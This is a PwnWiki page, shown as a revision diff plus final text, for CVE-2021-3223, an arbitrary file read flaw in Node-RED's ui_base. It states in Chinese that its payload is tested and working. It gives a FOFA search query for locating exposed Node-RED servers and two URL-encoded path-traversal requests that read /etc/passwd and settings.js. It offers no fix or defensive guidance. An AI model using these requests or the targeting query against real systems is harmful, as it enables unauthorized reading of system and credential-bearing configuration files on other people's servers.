Difference between revisions of "CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞"
From PwnWiki
(Created page with "<languages /> <center> {| style="border: 2.0px solid grey; background: #b3ff9c;" width="85%" | align="center" width="60px"| link=|55px | align="center" |'...") |
(Marked this version for translation) |
||
| Line 5: | Line 5: | ||
{| style="border: 2.0px solid grey; background: #b3ff9c;" width="85%" | {| style="border: 2.0px solid grey; background: #b3ff9c;" width="85%" | ||
| align="center" width="60px"| [[File:Check.png|link=|55px]] | | align="center" width="60px"| [[File:Check.png|link=|55px]] | ||
| − | | align="center" |'''<translate>該漏洞已通過驗證</translate>''' | + | | align="center" |'''<translate><!--T:1--> 該漏洞已通過驗證</translate>''' |
------ | ------ | ||
| − | <small><translate>本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。</translate></small> | + | <small><translate><!--T:2--> 本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。</translate></small> |
|} | |} | ||
</center> | </center> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:3--> |
</translate> | </translate> | ||
Node-RED | Node-RED | ||
| Line 27: | Line 27: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:4--> |
</translate> | </translate> | ||
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg | https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg | ||
Latest revision as of 17:20, 4 July 2021
|
該漏洞已通過驗證
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。 |
漏洞影響
Node-RED
FOFA
title="Node-RED"
POC
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
